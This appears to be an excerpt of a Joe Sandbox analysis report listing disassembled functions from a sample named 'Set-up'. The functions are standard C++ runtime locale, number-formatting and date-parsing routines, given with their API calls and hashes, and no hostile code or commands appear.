                                                                                              • Opcode ID: d37608ce3340cb6206a2b277b46c9bd52465e9f73d52048106eb6ab44c3b7a13
                                                                                              • Instruction ID: 4147fe7b245663e0129ac2b251303f8ebb45683fa21b5437d13a9dc9ef0f6781
                                                                                              • Opcode Fuzzy Hash: d37608ce3340cb6206a2b277b46c9bd52465e9f73d52048106eb6ab44c3b7a13
                                                                                              • Instruction Fuzzy Hash: 4BD05B7623423027CB20172DBC06E5D3F75DBE6221F154125F515F7150EB7E6B0182A0
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale___lc_handle_func
                                                                                              • String ID: 2
                                                                                              • API String ID: 3179915014-450215437
                                                                                              • Opcode ID: 7c20378d962dcf61b2739e95589e138e0eaa9ee0a59ac026d07042c97070186b
                                                                                              • Instruction ID: 5b3042c6715ed9d7cd72bfbb1798cabe10774ff6671adab2ca6002f8d842b825
                                                                                              • Opcode Fuzzy Hash: 7c20378d962dcf61b2739e95589e138e0eaa9ee0a59ac026d07042c97070186b
                                                                                              • Instruction Fuzzy Hash: 6CF0A736951518FACB02DB94D90BA8E73B8FB44398F608485E102E7081E7F8DF84D391

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC332F8
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000078,6BC3726C,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC33332
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A952: __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                                • Part of subcall function 6BC2A952: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC2A952: int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC2A952: std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC2A952: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC33390
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • localeconv.MSVCR100 ref: 6BC333B5
                                                                                              • memchr.MSVCR100 ref: 6BC333CC
                                                                                              • memchr.MSVCR100 ref: 6BC333DC
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC334B7
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC3355B
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC33581
                                                                                              • memchr.MSVCR100 ref: 6BC3359F
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC335C7
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC335E7
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC33633
                                                                                              • memchr.MSVCR100 ref: 6BC33650
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC33698
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC336CF
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC33678
                                                                                                • Part of subcall function 6BC26665: memchr.MSVCR100 ref: 6BC2667A
                                                                                                • Part of subcall function 6BC26665: ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2669E
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC336F8
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6BC33718
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,00000000,?,?,?,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC3373F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@V32@_$memchr$Putc@?$num_put@_Putgrouped@?$num_put@_$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@_DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcVlocale@2@W@std@@@std@@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 828282170-4024072794
                                                                                              • Opcode ID: efb31072884cf7b2e3e1e889ae2f9670d911369e8aad7191783d8a1929c409d8
                                                                                              • Instruction ID: 3a7a2a1bf5f4ed503932754045c2e10b9ca8e222977c8c978cd46359fb0f9706
                                                                                              • Opcode Fuzzy Hash: efb31072884cf7b2e3e1e889ae2f9670d911369e8aad7191783d8a1929c409d8
                                                                                              • Instruction Fuzzy Hash: 9FF167B1D10219AFDF11CFE8C985AEEBBB9FF49304F008059E815AB251E7399A55CF60

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC34255
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000078,6BC38375,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC3428F
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A9F5: __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                                • Part of subcall function 6BC2A9F5: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC2A9F5: int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC2A9F5: std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC2A9F5: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC342ED
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • localeconv.MSVCR100 ref: 6BC34312
                                                                                              • memchr.MSVCR100 ref: 6BC34329
                                                                                              • memchr.MSVCR100 ref: 6BC34339
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC34414
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC344B8
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC344DE
                                                                                              • memchr.MSVCR100 ref: 6BC344FC
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC34524
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC34544
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC34590
                                                                                              • memchr.MSVCR100 ref: 6BC345AD
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC345F5
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC3462C
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC345D5
                                                                                                • Part of subcall function 6BC26665: memchr.MSVCR100 ref: 6BC2667A
                                                                                                • Part of subcall function 6BC26665: ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2669E
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC34655
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6BC34675
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,00000000,?,?,?,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC3469C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@V32@_$memchr$Putc@?$num_put@_Putgrouped@?$num_put@_$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@_DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcVlocale@2@W@std@@@std@@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 828282170-4024072794
                                                                                              • Opcode ID: 46a6ddbc5bb2af96e3a14e4a78375f2df25774807c4619fd37396ef1a0931823
                                                                                              • Instruction ID: b5cdf45101e75301490c707db41488d715b2f6185346f0fc24587738f36d0b36
                                                                                              • Opcode Fuzzy Hash: 46a6ddbc5bb2af96e3a14e4a78375f2df25774807c4619fd37396ef1a0931823
                                                                                              • Instruction Fuzzy Hash: 46F16771D10219AFDF01CFE8C985AEEBBB9FF09304F004069E915AB251E7799A15CF61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC323D3
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000080,6BC36001,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC32414
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • localeconv.MSVCR100 ref: 6BC3247B
                                                                                              • memchr.MSVCR100 ref: 6BC32492
                                                                                              • memchr.MSVCR100 ref: 6BC324A2
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC3257D
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC3261D
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC32645
                                                                                              • memchr.MSVCR100 ref: 6BC32663
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC3268E
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,00000000,?), ref: 6BC326AF
                                                                                                • Part of subcall function 6BC24755: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,?,?,6BC251DF), ref: 6BC24767
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?), ref: 6BC326FE
                                                                                              • memchr.MSVCR100 ref: 6BC3271F
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,00000000,?), ref: 6BC32770
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC327A9
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC3274C
                                                                                                • Part of subcall function 6BC265CE: memchr.MSVCR100 ref: 6BC265E3
                                                                                                • Part of subcall function 6BC265CE: ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC26607
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC327D7
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,?,?), ref: 6BC327F8
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,00000000,?,?,?,?,?,?,00000000,?,00000030,?,?,?,?,?), ref: 6BC32821
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$ostreambuf_iterator@$D@std@@@2@D@std@@@std@@@std@@V32@$Rep@?$num_put@$memchr$Putc@?$num_put@Putgrouped@?$num_put@$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@D@std@@@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Vlocale@2@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 312808371-4024072794
                                                                                              • Opcode ID: 9f2d4c7a54e438624fad7f21aebf2dd4445cfe0da42fda2fe46028e2102bd6e2
                                                                                              • Instruction ID: e841fbad59a19da23e439ed113200c777a29362aa5b64c793f69a01c19e44604
                                                                                              • Opcode Fuzzy Hash: 9f2d4c7a54e438624fad7f21aebf2dd4445cfe0da42fda2fe46028e2102bd6e2
                                                                                              • Instruction Fuzzy Hash: 85F17571D11259AFDF01CFA8CC65AEEBBB5FF09300F108059E915AB261E7399A14CFA0

                                                                                              APIs
                                                                                              • ?_Getfmt@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z.MSVCP100(?,?,?,?,?,?,?,?,%m / %d / %y), ref: 6BC34BA6
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?), ref: 6BC34BC5
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC34C00
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,0000016E,?,00000001,0000001F,?,%b %d %H : %M : %S %Y), ref: 6BC34C52
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?,%d / %m / %y,00000006,?,%I : %M : %S %p,?,?,?,6BC11D60,0000016E,?), ref: 6BC34D1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$istreambuf_iterator@_$W@std@@@std@@@std@@$Getint@?$time_get@_W@std@@@2@0$Getfmt@?$time_get@_Utm@@V32@0Vios_base@2@W@std@@@2@
                                                                                              • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                              • API String ID: 1774632931-2659852414
                                                                                              • Opcode ID: 1fb5d8aa895e07f6403016475e0f9ceb01c285740a72cd3c37986083cba2f774
                                                                                              • Instruction ID: 28ab19069665dffebdc57f60af2809904ef670f5084a864982c24fa59a53ce28
                                                                                              • Opcode Fuzzy Hash: 1fb5d8aa895e07f6403016475e0f9ceb01c285740a72cd3c37986083cba2f774
                                                                                              • Instruction Fuzzy Hash: D2817572414219EFDB05CF98C981EDA7BB9FF09708F808495F955AA251E33AEB10DB60

                                                                                              APIs
                                                                                              • ?_Getfmt@?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@GU?$char_traits@G@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z.MSVCP100(?,?,?,?,?,?,?,?,%m / %d / %y), ref: 6BC34ED0
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?), ref: 6BC34EEF
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC34F2A
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,0000016E,?,00000001,0000001F,?,%b %d %H : %M : %S %Y), ref: 6BC34F7C
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?,%d / %m / %y,00000006,?,%I : %M : %S %p,?,?,?,6BC11D60,0000016E,?), ref: 6BC35047
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$istreambuf_iterator@_$Getint@?$time_get@_W@std@@@2@0W@std@@@std@@@std@@$U?$char_traits@V?$istreambuf_iterator@$G@std@@@2@G@std@@@std@@@std@@Getfmt@?$time_get@Utm@@V32@0Vios_base@2@
                                                                                              • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                              • API String ID: 832312750-2659852414
                                                                                              • Opcode ID: a934b370486baac7f06e20bbe6c6c070b8e5bafa7d69d824b4d2eced167d7ba4
